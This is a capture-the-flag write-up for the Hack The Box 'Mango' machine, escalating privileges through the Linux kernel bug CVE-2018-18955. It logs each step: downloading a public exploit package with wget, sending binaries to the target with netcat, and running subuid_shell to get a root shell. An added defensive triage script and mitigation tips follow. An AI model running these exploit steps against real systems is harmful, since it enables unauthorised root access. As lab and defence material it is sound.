CVE-2018-18955
PEAS has discovered that the target system is vulnerable to CVE-2018-18955.
A vulnerability classified as critical has been found in the Linux kernel up to 4.19.1 (Operating System). It affects the function map_write in the file kernel/user_namespace.c of the Access Control component. Manipulation with unknown input leads to an input validation vulnerability, which CWE classifies as CWE-20: the product receives input or data but does not validate, or incorrectly validates, that the input has the properties required to process it safely and correctly. This impacts confidentiality, integrity, and availability.
Exploit
Exploit found online
mango@mango:/dev/shm$ make ; gcc ; cc
Command 'make' not found, but can be installed with:
apt install make
apt install make-guile
Ask your administrator to install one of them.
Command 'gcc' not found, but can be installed with:
apt install gcc
Please ask your administrator.
Command 'cc' not found, but can be installed with:
apt install gcc
apt install clang
apt install pentium-builder
apt install tcc
Ask your administrator to install one of them.
Contrary to PEAS's claim, there are no compilers on the target system, so the exploit has to be compiled elsewhere.
Docker Exploit Development
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ docker run -it --entrypoint "/bin/bash" --name mango ubuntu:18.04
root@1a0f56450cf9:/# ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Setting up the Docker container to match the target environment: Ubuntu 18.04.2 with ldd (Ubuntu GLIBC 2.27-3ubuntu1) 2.27
root@1a0f56450cf9:/# apt update -y ; apt install net-tools netcat nano gcc gcc-multilib make git wget -y ; cd root
Installing the necessary packages
root@1a0f56450cf9:~# wget -q https://github.com/scheatkode/CVE-2018-18955/releases/download/v0.0.1/linux-x86_64.tar.gz ; tar -xf linux-x86_64.tar.gz ; cd linux-x86_64
Downloading the exploit package
root@1a0f56450cf9:~/linux-x86_64# ll
total 56
drwxr-xr-x 3 1001 121 4096 Jan 19 2022 ./
drwx------ 1 root root 4096 sep 29 00:11 ../
drwxr-xr-x 2 1001 121 4096 Jan 19 2022 bin/
-rwxr-xr-x 1 1001 121 2448 Jan 19 2022 exploit.bash_completion.sh*
-rwxr-xr-x 1 1001 121 2693 Jan 19 2022 exploit.cron.sh*
-rwxr-xr-x 1 1001 121 4223 Jan 19 2022 exploit.dbus.sh*
-rwxr-xr-x 1 1001 121 2467 Jan 19 2022 exploit.ldpreload.sh*
-rwxr-xr-x 1 1001 121 3218 Jan 19 2022 exploit.polkit.sh*
-rw-r--r-- 1 1001 121 357 Jan 19 2022 libsubuid.c
-rw-r--r-- 1 1001 121 147 Jan 19 2022 rootshell.c
-rw-r--r-- 1 1001 121 1859 Jan 19 2022 subshell.c
-rw-r--r-- 1 1001 121 6540 Jan 19 2022 subuid_shell.c
root@1a0f56450cf9:~/linux-x86_64# ll bin/
total 88
drwxr-xr-x 2 1001 121 4096 Jan 19 2022 ./
drwxr-xr-x 3 1001 121 4096 Jan 19 2022 ../
-rwxr-xr-x 1 1001 121 16408 Jan 19 2022 libsubuid.so*
-rwxr-xr-x 1 1001 121 16792 Jan 19 2022 rootshell*
-rwxr-xr-x 1 1001 121 17272 Jan 19 2022 subshell*
-rwxr-xr-x 1 1001 121 17928 Jan 19 2022 subuid_shell*
While the package contains the source code, it appears that there already are compiled binaries, so I will try those first.
root@1a0f56450cf9:~/linux-x86_64# tar -czf CVE-2018-18955.tar.gz ./bin
root@1a0f56450cf9:~/linux-x86_64# nc 10.10.10.162 2222 < CVE-2018-18955.tar.gz
mango@mango:/dev/shm$ nc -nlvp 2222 > CVE-2018-18955.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from 10.10.16.8 38318 received!
Delivery complete
Exploitation
mango@mango:/dev/shm$ tar -xf CVE-2018-18955.tar.gz ; cd bin
Unpacking
mango@mango:/dev/shm/bin$ ./subuid_shell
[.] starting
[.] setting up namespace
[~] done, namespace sandbox set up
[.] mapping subordinate ids
[.] subuid: 165536
[.] subgid: 165536
[~] done, mapped subordinate ids
[.] executing subshell
root@mango:/dev/shm/bin# whoami
root
root@mango:/dev/shm/bin# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
root@mango:/dev/shm/bin# hostname
mango
root@mango:/dev/shm/bin# /sbin/ifconfig -a
lo: flags=8<LOOPBACK> mtu 65536
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise
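A triage script for the defending side, added here and not part of the writeup or the exploit package: it reports which of the three preconditions the subuid_shell run above depended on (a kernel in the affected range, unprivileged user-namespace creation, and a subordinate uid range for the user) are present on a host, so that a fix can target the one that is easiest to remove. It assumes the Debian/Ubuntu kernel.unprivileged_userns_clone sysctl and the /etc/subuid format, and the 4.15 lower bound comes from upstream kernel history rather than from this page; the sample host values at the bottom are constructed.

```shell
#!/bin/sh
# Added triage helper, not part of the writeup or the exploit package. The
# subuid_shell run above needs an affected kernel, unprivileged user-namespace
# creation, and a subuid range for the user; each check also accepts sample input.

# kernel_affected VERSION -> 0 if VERSION lies in 4.15 .. 4.19.1 inclusive.
# 4.19.1 is the page's upper bound; 4.15 is where the reworked map_write
# (340-entry id maps) first shipped, so older kernels lack the bug.
kernel_affected() {
    v=${1%%-*}                          # "4.15.0-45-generic" -> "4.15.0"
    maj=${v%%.*}; rest=${v#*.}
    min=${rest%%.*}; pat=${rest#*.}
    [ "$pat" = "$rest" ] && pat=0       # "4.19" carries no patch number
    num=$((maj * 1000000 + min * 1000 + pat))
    [ "$num" -ge 4015000 ] && [ "$num" -le 4019001 ]
}

# unpriv_userns_enabled [FILE] -> 0 when unprivileged users may create user
# namespaces. FILE defaults to the Debian/Ubuntu sysctl; if the knob is
# absent the kernel applies no such restriction, so that counts as enabled.
unpriv_userns_enabled() {
    f=${1:-/proc/sys/kernel/unprivileged_userns_clone}
    [ -r "$f" ] || return 0
    [ "$(cat "$f")" != "0" ]
}

# subuid_range USER [FILE] -> prints "start:count" for USER from /etc/subuid
# (or FILE) and returns 0; returns 1 when USER has no subordinate uid range.
subuid_range() {
    f=${2:-/etc/subuid}
    [ -r "$f" ] || return 1
    awk -F: -v u="$1" '$1 == u { print $2 ":" $3; found = 1 } END { exit !found }' "$f"
}

# report USER [KERNEL] [SYSCTL_FILE] [SUBUID_FILE] -> 0 only when all three
# preconditions hold, i.e. the host is set up the way the target above was.
report() {
    hits=0
    kernel_affected "${2:-$(uname -r)}" && { echo "[!] kernel in affected range"; hits=$((hits+1)); }
    unpriv_userns_enabled "$3" && { echo "[!] unprivileged user namespaces allowed"; hits=$((hits+1)); }
    r=$(subuid_range "$1" "$4") && { echo "[!] $1 has subuid range $r"; hits=$((hits+1)); }
    [ "$hits" -eq 3 ]
}

# Constructed sample: knob at 1, a 4.15 kernel string, and the 165536 subuid
# start seen in the output above (the 65536 count is the usual default).
d=$(mktemp -d); printf '1\n' > "$d/userns"; printf 'mango:165536:65536\n' > "$d/subuid"
report mango 4.15.0-45-generic "$d/userns" "$d/subuid" && echo "sample: all three present"
rm -rf "$d"; report "$(id -un)" || echo "live host: not all three present"
```

Turning kernel.unprivileged_userns_clone off or dropping the user's /etc/subuid entry removes a precondition on hosts that cannot be patched straight away.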
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ docker rm mango
mango